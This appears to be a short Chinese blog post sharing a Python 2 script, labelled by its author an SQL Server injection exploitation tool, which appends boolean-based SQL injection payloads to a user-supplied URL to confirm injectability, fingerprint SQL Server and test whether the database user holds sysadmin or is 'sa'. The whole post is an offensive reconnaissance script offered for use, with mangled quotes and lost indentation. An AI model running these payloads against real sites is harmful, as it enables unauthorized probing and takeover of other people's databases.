本文讲述一个用python写的小程序,用于有注入点的链接,以检测当前数据库用户是否为sa,详细代码如下:
# code by zhaoxiaobu email: little.bu@hotmail.com
#-*- coding: utf-8 -*-
from sys import exit
from urllib import urlopen
from string import join,strip
from re import search
def is_sqlable():
sql1=”%20and%201=2″
sql2=”%20and%201=1″
urlfile1=urlopen(url+sql1)
urlfile2=urlopen(url+sql2)
htmlcodes1=urlfile1.read()
htmlcodes2=urlfile2.read()
if not search(judge,htmlcodes1) and search(judge,htmlcodes2):
print “[信息]恭喜!这个url是有注入漏洞的!n”
print “[信息]现在判断数据库是否是sql server,请耐心等候…..”
is_sqlserver()
else:
print “[错误]你确定这个url能用?换个别的试试吧!n”
def is_sqlserver():
sql = “%20and%20exists%20(select%20*%20from%20sysobjects)”
urlfile=urlopen(url+sql)
htmlcodes=urlfile.read()
if not search(judge,htmlcodes):
print “[错误]数据库好像不是sql server的!n”
else:
print “[信息]确认是sql server数据库!n”
print “[信息]开始检测当前数据库用户权限,请耐心等待……”
is_sysadmin()
def is_sysadmin():
sql = “%20and%201=(select%20is_srvrolemember(‘sysadmin’))”
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
print “[错误]当前数据库用户不具有sysadmin权限!n”
else:
print “[信息]当前数据库用户具有sysadmin权限!n”
print “[信息]检测当前用户是不是sa,请耐心等待……”
is_sa()
def is_sa():
sql = “%20and%20’sa’=(select%20system_user)”;
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
print “[错误]当前数据库用户不是sa!n”
else:
print “[信息]当前数据库用户是sa!n”
print “n########################################################################n”
print ” ^o^sql server注入利用工具^o^ ”
print ” email: little.bu@hotmail.comn”
print “========================================================================”;
url = raw_input(‘[信息]请输入一个可能有注入漏洞的链接!nurl:’)
if url == ”:
print “[错误]提供的url必须具有 ‘.asp?xxx=’ 这样的格式”
exit(1)
judge = raw_input(“[信息]请提供一个判断字符串.n判断字符串:”)
if judge == ”:
print “[错误]判断字符串不能为空!”
exit(1)
is_sqlable()